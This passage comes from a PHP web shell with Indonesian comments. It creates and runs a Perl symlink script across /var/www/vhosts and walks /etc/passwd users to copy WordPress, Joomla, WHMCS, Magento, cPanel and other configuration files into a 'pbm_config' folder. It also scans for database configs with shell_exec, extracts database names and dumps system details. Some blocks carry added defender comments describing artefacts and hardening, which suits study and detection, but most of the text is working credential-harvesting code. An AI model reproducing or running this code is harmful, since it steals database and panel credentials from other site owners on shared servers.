'; $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); // Buat file vhost.cin (Perl script untuk symlink) $vhost_script = '#!/usr/bin/perl -I/usr/local/bandmin opendir(my $dir , "/var/www/vhosts/"); foreach(sort readdir $dir) { my $isDir = 0; $isDir = 1 if -d $_; $sitess = $_; if($isDir && $sitess !~ /^\./) { # Buat symlink untuk berbagai konfigurasi CMS symlink("/var/www/vhosts/$sitess/httpdocs/includes/configure.php", "$sitess-shop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/os/includes/configure.php", "$sitess-shop-os.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscom/includes/configure.php", "$sitess-oscom.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerce/includes/configure.php", "$sitess-oscommerce.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/oscommerces/includes/configure.php", "$sitess-oscommerces.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/configure.php", "$sitess-shop2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shopping/includes/configure.php", "$sitess-shop-shopping.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sale/includes/configure.php", "$sitess-sale.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/amember/config.inc.php", "$sitess-amember.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.inc.php", "$sitess-amember2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/members/configuration.php", "$sitess-members.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/config.php", "$sitess-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/includes/config.php", "$sitess-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/conf.php", "$sitess-5.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-4.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wp/wp-config.php", 
"$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/WP/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/press/wp-config.php", "$sitess-wp13-press.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/wp-config.php", "$sitess-wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Wordpress/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/wordpress/beta/wp-config.php", "$sitess-Wordpress.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/wp-config.php", "$sitess-Wordpress-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/wp-config.php", "$sitess-Wordpress-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blog/wp-config.php", "$sitess-Wordpress-blog.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/beta/wp-config.php", "$sitess-Wordpress-beta.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/blogs/wp-config.php", "$sitess-Wordpress-blogs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/wp-config.php", "$sitess-Wordpress-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/wp-config.php", "$sitess-Wordpress-portal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/wp-config.php", "$sitess-Wordpress-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/wp-config.php", "$sitess-Wordpress-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/test/wp-config.php", "$sitess-Wordpress-test.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/arcade/functions/dbclass.php", "$sitess-ibproarcade.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/joomla/configuration.php", "$sitess-joomla2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/portal/configuration.php", "$sitess-joomla-portal.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/joo/configuration.php", "$sitess-joo.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cms/configuration.php", "$sitess-joomla-cms.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/site/configuration.php", "$sitess-joomla-site.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/main/configuration.php", "$sitess-joomla-main.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/news/configuration.php", "$sitess-joomla-news.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/new/configuration.php", "$sitess-joomla-new.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/home/configuration.php", "$sitess-joomla-home.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/config.php", "$sitess-vb~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb3/includes/config.php", "$sitess-vb3~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/config.php", "$sitess-vb1~config.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/includes/class_core.php", "$sitess-vbluttin~class_core.php.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/vb/includes/class_core.php", "$sitess-vbluttin~class_core.php1.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cc/includes/class_core.php", "$sitess-vbluttin~class_core.php2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm15.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/central/configuration.php", "$sitess-whm-central.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/whmcs/configuration.php", "$sitess-whm-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/WHMCS/configuration.php", "$sitess-whm-WHMCS.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmc/WHM/configuration.php", "$sitess-whmc-WHM.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whmcs/configuration.php", "$sitess-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/support/configuration.php", "$sitess-support.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/supp/configuration.php", "$sitess-supp.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/configuration.php", "$sitess-sucure.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whm/configuration.php", "$sitess-sucure-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/secure/whmcs/configuration.php", "$sitess-sucure-whmcs.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cpanel/configuration.php", "$sitess-cpanel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/panel/configuration.php", "$sitess-panel.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/configuration.php", "$sitess-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/configuration.php", "$sitess-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/configuration.php", "$sitess-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/configuration.php", "$sitess-joomla.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/submitticket.php", "$sitess-whmcs2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clients/configuration.php", "$sitess-clients.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/configuration.php", "$sitess-client.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientes/configuration.php", "$sitess-clientes.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/cliente/configuration.php", "$sitess-cliente.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/clientsupport/configuration.php", "$sitess-clientsupport.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/configuration.php", "$sitess-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/manage/configuration.php", "$sitess-whm-manage.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/my/configuration.php", "$sitess-whm-my.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/myshop/configuration.php", "$sitess-whm-myshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/dist-configure.php", "$sitess-zencart.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/zencart/includes/dist-configure.php", "$sitess-shop-zencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/shop/includes/dist-configure.php", "$sitess-shop-ZCshop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/Settings.php", "$sitess-smf.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/smf/Settings.php", "$sitess-smf2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forum/Settings.php", "$sitess-smf-forum.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/forums/Settings.php", "$sitess-smf-forums.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/upload/includes/config.php", "$sitess-up.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/article/config.php", "$sitess-Nwahy.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/up/includes/config.php", "$sitess-up2.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/conf_global.php", "$sitess-6.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/include/db.php", "$sitess-7.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/connect.php", "$sitess-PHP-Fusion.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/mk_conf.php", "$sitess-9.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config.php", "$sitess-4images.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/sites/default/settings.php", "$sitess-Drupal.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/member/configuration.php", "$sitess-1member.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/configuration.php", "$sitess-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/whm/configuration.php", "$sitess-whm.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/configuration.php", "$sitess-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/requires/config.php", "$sitess-AM4SS-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/supports/includes/iso4217.php", "$sitess-hostbills-supports.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/client/includes/iso4217.php", "$sitess-hostbills-client.txt"); 
symlink("/var/www/vhosts/$sitess/httpdocs/support/includes/iso4217.php", "$sitess-hostbills-support.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billing/includes/iso4217.php", "$sitess-hostbills-billing.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/billings/includes/iso4217.php", "$sitess-hostbills-billings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/host/includes/iso4217.php", "$sitess-hostbills-host.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosts/includes/iso4217.php", "$sitess-hostbills-hosts.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hosting/includes/iso4217.php", "$sitess-hostbills-hosting.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostings/includes/iso4217.php", "$sitess-hostbills-hostings.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/hostbillincludes/iso4217.php", "$sitess-hostbills-hostbills.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/includes/iso4217.php", "$sitess-hostbills-hostbill.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/app/etc/local.xml", "$sitess-Magento.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/admin/config.php", "$sitess-Opencart.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/settings.inc.php", "$sitess-Prestashop.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/lokomedia/config/koneksi.php", "$sitess-Lokomedia.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/slconfig.php", "$sitess-Sitelok.txt"); symlink("/var/www/vhosts/$sitess/httpdocs/application/config/database.php", "$sitess-Ellislab.txt"); } } print "Location: ./\n\n";'; $vhost_file = $config_dir . "/vhost.cin"; @file_put_contents($vhost_file, $vhost_script); @chmod($vhost_file, 0755); echo '
vHosts Config Script Created: vhost.cin
This Perl script will create symlinks to configuration files
'; echo '
Open pbm_config Directory '; // Try to execute the script $output = @shell_exec("cd " . escapeshellarg($config_dir) . " && ./vhost.cin 2>&1"); if($output) { echo '
Script executed successfully!
Symlinks created in pbm_config directory
'; } else { echo '
Script ready to run. You can execute it manually from the directory.
'; } echo '
'; } else { // Jika tidak di vhosts, scan /etc/passwd untuk user echo '
Scanning /etc/passwd for user configurations...
'; $etc = @fopen("/etc/passwd", "r"); if(!$etc) { echo '
Error: Cannot read /etc/passwd
'; } else { $users_found = 0; $configs_found = 0; // Daftar konfigurasi yang akan di-scan $grab_config = array( // vBulletin "/home/USER/public_html/vb/includes/config.php" => "vBulletin1", "/home/USER/public_html/forum/includes/config.php" => "vBulletin3", "/home/USER/public_html/cc/includes/config.php" => "vBulletin4", "/home/USER/public_html/includes/config.php" => "vBulletin2", // WordPress "/home/USER/public_html/wp-config.php" => "Wordpress1", "/home/USER/public_html/blog/wp-config.php" => "Wordpress2", "/home/USER/public_html/wp/wp-config.php" => "WordPress", "/home/USER/public_html/wordpress/wp-config.php" => "WordPress", // Joomla "/home/USER/public_html/configuration.php" => "Joomla1", "/home/USER/public_html/blog/configuration.php" => "Joomla2", "/home/USER/public_html/joomla/configuration.php" => "Joomla3", "/home/USER/public_html/portal/configuration.php" => "joomla-portal", // WHMCS "/home/USER/public_html/whm/configuration.php" => "Whm1", "/home/USER/public_html/whmc/configuration.php" => "Whm2", "/home/USER/public_html/support/configuration.php" => "Whm3", "/home/USER/public_html/client/configuration.php" => "Whm4", "/home/USER/public_html/billings/configuration.php" => "Whm5", "/home/USER/public_html/billing/configuration.php" => "Whm6", "/home/USER/public_html/clients/configuration.php" => "Whm7", "/home/USER/public_html/whmcs/configuration.php" => "Whm8", "/home/USER/public_html/order/configuration.php" => "Whm9", // Other CMS "/home/USER/public_html/admin/conf.php" => "5", "/home/USER/public_html/admin/config.php" => "4", "/home/USER/public_html/conf_global.php" => "invisio", "/home/USER/public_html/include/db.php" => "7", "/home/USER/public_html/connect.php" => "8", "/home/USER/public_html/mk_conf.php" => "mk-portale1", "/home/USER/public_html/include/config.php" => "12", "/home/USER/public_html/settings.php" => "Smf", "/home/USER/public_html/includes/functions.php" => "phpbb3", // PopojiCMS "/home/USER/public_html/po-content/config.php" => 
"Popoji", // Voodoo "/home/USER/public_html/vdo_config.php" => "Voodoo", // BosWeb "/home/USER/public_html/bw-configs/config.ini" => "BosWeb", // Lokomedia "/home/USER/public_html/config/koneksi.php" => "Lokomedia", "/home/USER/public_html/lokomedia/config/koneksi.php" => "Lokomedia", // Drupal "/home/USER/public_html/sites/default/settings.php" => "Drupal", // PrestaShop "/home/USER/public_html/config/settings.inc.php" => "PrestaShop", // Magento "/home/USER/public_html/app/etc/local.xml" => "Magento", // OpenCart "/home/USER/public_html/admin/config.php" => "OpenCart", "/home/USER/public_html/config.php" => "OpenCart-config", // Sitelok "/home/USER/public_html/slconfig.php" => "Sitelok", // EllisLab (ExpressionEngine) "/home/USER/public_html/application/config/database.php" => "Ellislab", // CPanel/WHM "/home/USER/.my.cnf" => "cpanel", "/home/USER/.accesshash" => "WHM-accesshash" ); // Home directories 1-7 $home_dirs = ['', '2', '3', '4', '5', '6', '7']; echo '
';
// Defender note: this loop is the data-collection core of the "/etc/passwd"
// branch. For every account name read from $etc it probes the fixed path
// templates in $grab_config under /home, /home2 ... /home7 and copies any
// readable file into $config_dir. The files it targets hold database and
// panel credentials, so a hit here should be treated as credential exposure
// for the affected account, not just as a file read.
// Artefacts to look for during triage: files named "<account>-<label>.txt"
// inside $config_dir (the status text further down calls it pbm_config/).
// Hardening that defeats this loop: home directories and config files that
// are not readable by other accounts or by a shared web-server user.
while($passwd = @fgets($etc)) {
    // Only lines whose second field is "x" (shadowed password) are used;
    // the first field is taken as the account name.
    if(preg_match('/^([^:]+):x:/', $passwd, $matches)) {
        $user_idx = $matches[1];
        $users_found++;
        $user_configs_found = 0;
        foreach($home_dirs as $home_num) {
            // '' maps to /home, '2'..'7' map to /home2../home7.
            $home_prefix = $home_num ? "home{$home_num}" : "home";
            // Assigned here but not read again within this loop.
            $user_config_dir = "/{$home_prefix}/{$user_idx}/public_html/";
            // Cheap pre-check: skip the whole template list when the
            // account's home directory itself is not readable.
            if(is_readable("/{$home_prefix}/{$user_idx}/")) {
                foreach($grab_config as $config_pattern => $config_name) {
                    // Expand the template: USER -> account name, then
                    // /home/ -> the home prefix currently being tried.
                    $config_file = str_replace("USER", $user_idx, $config_pattern);
                    $config_file = str_replace("/home/", "/{$home_prefix}/", $config_file);
                    if(file_exists($config_file) && is_readable($config_file)) {
                        // Counters are bumped on existence, before the
                        // content check below, so they can exceed the
                        // number of files actually written.
                        $configs_found++;
                        $user_configs_found++;
                        // Save config to file
                        $config_content = @file_get_contents($config_file);
                        if($config_content !== false && trim($config_content) != '') {
                            // One output file per (account, label); two
                            // templates sharing a label write the same name.
                            $output_file = $config_dir . "/{$user_idx}-{$config_name}.txt";
                            @file_put_contents($output_file, $config_content);
                            echo '';
                        }
                    }
                }
            }
        }
        // If no configuration was found for this user
        if($user_configs_found == 0) {
            echo '';
        }
    }
}
@fclose($etc);
echo '
User Config Found File Status
'.$user_idx.' '.$config_name.' '.htmlspecialchars(basename($config_file)).' Saved
'.$user_idx.' No configurations found
'; echo '
Scan Complete:
Users scanned: '.$users_found.'
Configurations found: '.$configs_found.'
Files saved to: pbm_config/
'; if($configs_found > 0) { echo ''; } } } // Quick Scan Options echo '
Quick CMS Scan
Database Config Scanner
'; // Handle quick CMS scan if(isset($_POST['quick_cms_scan'])) { $scan_dir = $_POST['scan_cms_dir']; $cms_types = $_POST['cms_types'] ?? []; echo '
Quick CMS Scan Results:
';
// Defender note: "Quick CMS Scan". $scan_dir and $cms_types both come
// straight from the POST body (assigned just above this span), so the
// operator chooses which tree is walked. Nothing is copied in this step;
// it only builds a list of candidate configuration files for the
// follow-up "View"/"Open" actions rendered below.
if(is_dir($scan_dir) && is_readable($scan_dir)) {
    // Map of display label -> list of file names to look for, built from
    // the ticked CMS types.
    $cms_patterns = [];
    if(in_array('wordpress', $cms_types)) {
        $cms_patterns['WordPress'] = ['wp-config.php'];
    }
    if(in_array('joomla', $cms_types)) {
        $cms_patterns['Joomla'] = ['configuration.php'];
    }
    if(in_array('drupal', $cms_types)) {
        $cms_patterns['Drupal'] = ['sites/default/settings.php'];
    }
    if(in_array('vbulletin', $cms_types)) {
        $cms_patterns['vBulletin'] = ['includes/config.php'];
    }
    if(in_array('whmcs', $cms_types)) {
        $cms_patterns['WHMCS'] = ['configuration.php'];
    }
    $found_cms = [];
    // Recursive scan function
    /**
     * Walk $dir depth-first and append one entry to $found for every file
     * whose base name equals one of the names in $patterns.
     *
     * Declared inside the request branch, so the function only exists once
     * this branch has executed.
     *
     * @param string $dir       Directory to list.
     * @param array  $patterns  Label => list of file names to compare against.
     * @param array  $found     Output list (by reference); each entry has
     *                          'cms', 'file' and 'dir' keys.
     * @param int    $depth     Current recursion level.
     * @param int    $max_depth Recursion stops once $depth reaches this value.
     * @return void
     */
    function scanForCMS($dir, $patterns, &$found, $depth = 0, $max_depth = 3) {
        // The depth cap is the only bound on the walk.
        if($depth >= $max_depth) return;
        if(!is_dir($dir) || !is_readable($dir)) return;
        $items = @scandir($dir);
        // false (listing failed) and an empty list are both treated as
        // "nothing here".
        if(!$items) return;
        foreach($items as $item) {
            if($item == '.' || $item == '..') continue;
            $path = $dir . '/' . $item;
            if(is_dir($path)) {
                scanForCMS($path, $patterns, $found, $depth + 1, $max_depth);
            } elseif(is_file($path)) {
                foreach($patterns as $cms_name => $cms_files) {
                    foreach($cms_files as $cms_file) {
                        // Comparison is on the base name only.
                        if(basename($path) == $cms_file) {
                            $found[] = [
                                'cms' => $cms_name,
                                'file' => $path,
                                'dir' => dirname($path)
                            ];
                        }
                    }
                }
            }
        }
    }
    scanForCMS($scan_dir, $cms_patterns, $found_cms);
    if(!empty($found_cms)) {
        echo '
Found '.count($found_cms).' CMS configuration files
'; foreach($found_cms as $cms) { echo ''; } echo '
CMS Config File Directory Actions
'.$cms['cms'].' '.htmlspecialchars(basename($cms['file'])).' '.$cms['dir'].' View Open
'; } else { echo '
No CMS configuration files found in the specified directory
'; } } else { echo '
Cannot read directory: '.$scan_dir.'
'; } echo '
'; } // Handle database config scan if(isset($_POST['scan_db_configs'])) { $search_type = $_POST['db_search_type']; echo '
Database Config Scan Results:
';
// Defender note: "Database Config Scanner". This step shells out to find(1)
// once per (location, file name) pair and then reads every hit to see
// whether it looks like a database configuration. On a monitored host the
// visible signal is the web-server/PHP user spawning a shell that runs
// "find <dir> -name '<config file name>' -type f ... | head -20" against
// /home and /var/www, followed by reads of wp-config.php, .env and similar
// files across many sites. Process-lineage rules (web server -> sh -> find)
// and disabling shell_exec in php.ini both apply here.
// Patterns for database configs
$db_patterns = [
    'wp-config.php' => 'WordPress',
    'configuration.php' => 'Joomla',
    'settings.php' => 'Drupal',
    'config.php' => 'General Config',
    '.env' => 'Environment',
    'database.php' => 'Laravel/CodeIgniter',
    'local.xml' => 'Magento',
    'settings.inc.php' => 'PrestaShop'
];
// Filter based on search type
// $search_type is the raw POST value assigned just above this span; any
// value other than the four cases below selects the full pattern list.
$filtered_patterns = [];
switch($search_type) {
    case 'wp':
        $filtered_patterns = ['wp-config.php' => 'WordPress'];
        break;
    case 'joomla':
        $filtered_patterns = ['configuration.php' => 'Joomla'];
        break;
    case 'config':
        $filtered_patterns = ['config.php' => 'General Config', 'configuration.php' => 'Joomla'];
        break;
    case 'env':
        $filtered_patterns = ['.env' => 'Environment'];
        break;
    default:
        $filtered_patterns = $db_patterns;
}
// Search in common locations
// $dir is set outside this span (presumably the shell's current directory);
// the remaining entries are fixed web-root guesses.
$common_locations = [
    $dir,
    '/home',
    '/var/www',
    '/var/www/html',
    '/usr/local/apache2/htdocs'
];
$found_db_configs = [];
foreach($common_locations as $location) {
    if(is_dir($location) && is_readable($location)) {
        foreach($filtered_patterns as $file_pattern => $file_type) {
            // The location is shell-quoted; the file name is only ever one
            // of the literal keys defined above, never request data.
            // "head -20" caps the hits per location/pattern pair.
            $command = "find " . escapeshellarg($location) . " -name '" . $file_pattern . "' -type f 2>/dev/null | head -20";
            $files = @shell_exec($command);
            if($files) {
                $file_list = explode("\n", trim($files));
                foreach($file_list as $file) {
                    if(!empty($file) && file_exists($file)) {
                        // Each candidate is read in full and kept only if it
                        // mentions common database keywords or connect calls.
                        $content = @file_get_contents($file);
                        if($content && (preg_match('/DB_HOST|dbname|database|localhost|127.0.0.1/i', $content) || preg_match('/define.*DB_|mysql_connect|mysqli_connect/i', $content))) {
                            // 'has_db' is always true for stored entries.
                            $found_db_configs[] = [
                                'file' => $file,
                                'type' => $file_type,
                                'dir' => dirname($file),
                                'has_db' => true
                            ];
                        }
                    }
                }
            }
        }
    }
}
if(!empty($found_db_configs)) {
    echo '
Found '.count($found_db_configs).' database configuration files
'; foreach($found_db_configs as $db_config) { // Try to extract database info $content = @file_get_contents($db_config['file']); $db_info = 'Not found'; if($content) { if(preg_match('/define.*[\'"]DB_NAME[\'"].*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/[\'"]database[\'"]\s*=>\s*[\'"]([^\'"]+)[\'"]/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } elseif(preg_match('/dbname=([^;]+)/i', $content, $matches)) { $db_info = 'DB: ' . $matches[1]; } } echo ''; } echo '
Type File Directory DB Info Actions
'.$db_config['type'].' '.htmlspecialchars(basename($db_config['file'])).' '.$db_config['dir'].' '.$db_info.' View Open
'; } else { echo '
No database configuration files found
'; } echo '
'; } echo '
'; } // Tab Archive Tools - DIPERBAIKI (Detect Archive di current dir) elseif($_GET['do'] == 'archive') { echo '
Archive Tools
'; // Detect archive files in current directory $archive_files = detectArchiveFiles($dir); if(!empty($archive_files)) { echo '
Archive Files Found in Current Directory:
'; foreach($archive_files as $archive) { $ext_badge = ''; switch($archive['ext']) { case 'zip': $ext_badge = 'bg-success'; break; case 'tar': $ext_badge = 'bg-primary'; break; case 'gz': $ext_badge = 'bg-warning'; break; case 'bz2': $ext_badge = 'bg-danger'; break; case 'rar': $ext_badge = 'bg-info'; break; default: $ext_badge = 'bg-secondary'; } echo ''; } echo '
File Name Type Size Actions
'.$archive['name'].' .'.$archive['ext'].' '.$archive['size'].'
Download

'; } else { echo '
No archive files found in current directory
'; } echo '
'; // Archive Operations echo '
Extract Archive
Supported: .zip, .tar, .tar.gz, .tar.bz2, .rar
'; if(isset($_POST['do_extract'])) { $extract_to = $_POST['extract_path'] ?: $dir; if(isset($_FILES['archive_file']) && $_FILES['archive_file']['error'] == 0) { $tmp_file = $_FILES['archive_file']['tmp_name']; $orig_name = $_FILES['archive_file']['name']; $target_file = sys_get_temp_dir() . '/' . $orig_name; if(move_uploaded_file($tmp_file, $target_file)) { if(unarchiveFile($target_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive. Make sure the file format is supported.
'; } @unlink($target_file); } } elseif(!empty($_POST['existing_archive'])) { $archive_file = $_POST['existing_archive']; if(file_exists($archive_file) && is_readable($archive_file)) { if(unarchiveFile($archive_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive. Make sure the file format is supported.
'; } } else { echo '
Archive file not found or not readable: '.$archive_file.'
'; } } else { echo '
Please select an archive file or enter a path
'; } } // Handle extract from detected archives if(isset($_POST['extract_archive'])) { $archive_file = $_POST['archive_file']; $extract_to = $dir; if(unarchiveFile($archive_file, $extract_to)) { echo '
Archive extracted successfully to '.$extract_to.'
'; } else { echo '
Failed to extract archive
'; } } echo '
'; // Create Archive echo '
Create Archive
'; if(isset($_POST['create_archive'])) { $archive_dir = $_POST['archive_dir']; $archive_name = $_POST['archive_name']; $archive_type = $_POST['archive_type']; $archive_path = $dir . '/' . $archive_name; if(is_dir($archive_dir) && is_readable($archive_dir)) { // Untuk ZIP if($archive_type == 'zip' && class_exists('ZipArchive')) { $zip = new ZipArchive(); if($zip->open($archive_path, ZipArchive::CREATE) === TRUE) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($archive_dir), RecursiveIteratorIterator::LEAVES_ONLY ); foreach($files as $file) { if(!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($archive_dir) + 1); $zip->addFile($filePath, $relativePath); } } $zip->close(); echo '
Archive created successfully: '.$archive_path.'
Size: '.formatSize($archive_path).'
'; } else { echo '
Failed to create ZIP archive
'; } } else { echo '
ZIP creation requires ZipArchive class. Try using shell commands instead.
'; } } else { echo '
Directory not found or not readable: '.$archive_dir.'
'; } } // Check archive support echo '
Archive Support Status:
ZipArchive Class: '.(class_exists('ZipArchive') ? 'Available' : 'Not Available').'
PharData Class: '.(class_exists('PharData') ? 'Available' : 'Not Available').'
Shell Exec for tar/zip: '.(function_exists('shell_exec') ? 'Available' : 'Limited').'
'; echo '
'; } // Tab System Info - DIPERBAIKI (Network Info) elseif($_GET['do'] == 'system') { $php_version = PHP_VERSION; $safe_mode = (@ini_get("safe_mode") == 'on') ? checkStatus(false) : checkStatus(true); $magic_quotes = (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) ? checkStatus(true) : checkStatus(false); $mysql = (function_exists('mysqli_connect')) ? checkStatus(true) : checkStatus(false); $exec = (function_exists('exec')) ? checkStatus(true) : checkStatus(false); $open_basedir = (ini_get("open_basedir")) ? checkStatus(true) : checkStatus(false); $symlink = (function_exists('symlink')) ? checkStatus(true) : checkStatus(false); echo '
System Information
'; // Basic Info Column echo '
Basic Info
OS'.$os.'
Kernel'.$kernel.'
Server Software'.$_SERVER['SERVER_SOFTWARE'].'
PHP Version'.$php_version.'
Document Root'.$_SERVER['DOCUMENT_ROOT'].'
'; // PHP Features Column echo '
PHP Features
Safe Mode'.$safe_mode.'
Magic Quotes'.$magic_quotes.'
Open Basedir'.$open_basedir.'
Exec Function'.$exec.'
Symlink'.$symlink.'
MySQL Support'.$mysql.'
'; // Tools Column echo '
Available Tools
cURL'.$curl.'
Wget'.$wget.'
Perl'.$perl.'
Python'.$python.'
Disk Space Free'.$freespace.'
Disk Space Total'.$total.'
'; // Network Column - DIPERBAIKI echo '
Network Info
Server IP'.'Server IP - '.$server_ip.' {'.$_SERVER['REMOTE_ADDR'].'}
Your IP'.$ip_user.'
Hostname'.gethostname().'
User Agent'.$_SERVER['HTTP_USER_AGENT'].'
Disabled Functions:
'; echo '
'; // OS Specific Information if ($os == 'Windows') { echo '
Windows Information
'; $account_settings = exe('net accounts'); $account_user = exe('net user'); echo '
User Accounts
'.$account_user.'
'; echo '
System Accounts
'.$account_settings.'
'; echo '
'; } if ($os == 'Linux') { echo '
Linux Information
'; $hdd_space = exe('df -h'); $hosts = exe('cat /etc/hosts'); echo '
Disk Usage
'.$hdd_space.'
System Info
'; if (is_readable('/etc/passwd')) { echo ''; } else { echo ''; } echo '
Distribution'.exe('cat /etc/issue').'
Current User'.exe('whoami').'
